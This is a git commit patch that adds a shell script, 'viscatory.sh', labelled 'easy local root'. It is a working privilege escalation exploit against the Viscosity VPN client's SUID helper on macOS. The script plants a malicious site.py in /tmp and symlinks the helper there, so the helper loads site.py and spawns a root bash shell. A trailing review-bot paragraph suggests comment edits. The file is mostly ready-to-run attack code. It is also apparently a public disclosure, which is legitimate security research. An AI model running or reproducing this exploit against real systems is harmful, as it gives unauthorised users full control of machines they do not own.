From 0d36d2ec75f3098a3a250d84dc38962f0aedfeb6 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Mon, 13 Aug 2012 05:51:52 +0200
Subject: Initial commit of easy local root.

---
viscatory.sh | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100755 viscatory.sh
(limited to 'viscatory.sh')
diff --git a/viscatory.sh b/viscatory.sh
new file mode 100755
index 0000000..4f323b3
--- /dev/null
+++ b/viscatory.sh
@@ -0,0 +1,32 @@
+#!/bin/sh
+#
+##########################
+# Viscatory #
+# #
+# zx2c4 #
+##########################
+#
+# After the hullabaloo from the Tunnelblick local root, savy Mac users
+# began defending Viscosity, another OS X VPN client. They figured, since
+# they spent money on Viscosity, surely it would be better designed than
+# the free alternative.
+#
+# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
+# the win. Here, the SUID helper will execute site.py in its enclosing
+# folder. A simple symlink, and we have root.
+echo "[+] Crafting payload."
+mkdir -p -v /tmp/pwn
+cat > /tmp/pwn/site.py <<_EOF
+import os
+print "[+] Cleaning up."
+os.system("rm -rvf /tmp/pwn")
+print "[+] Getting root."
+os.setuid(0)
+os.setgid(0)
+os.execl("/bin/bash", "bash")
+_EOF
+echo "[+] Making symlink."
+ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
+echo "[+] Running vulnerable SUID helper."
+exec /tmp/pwn/root
-- 
cgit v1.2.3-59-g8ed1b
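Review bot: The header comment describes the flaw only informally ("the SUID helper will execute site.py in its enclosing folder") and records neither the Viscosity version the script was written against nor whether a vendor fix exists, so a reader cannot tell from the file whether the finding is still current. Add a line under the zx2c4 banner such as `# Tested against: Viscosity <VERSION - fill in>; vendor fix status: <unknown at time of writing>`. The comments also do not say that the final `exec /tmp/pwn/root` replaces the shell, so no statement after it would ever run; a one-line `# exec: the helper replaces this shell, nothing below runs` would make that explicit. The script is the whole file, so the hunk is complete.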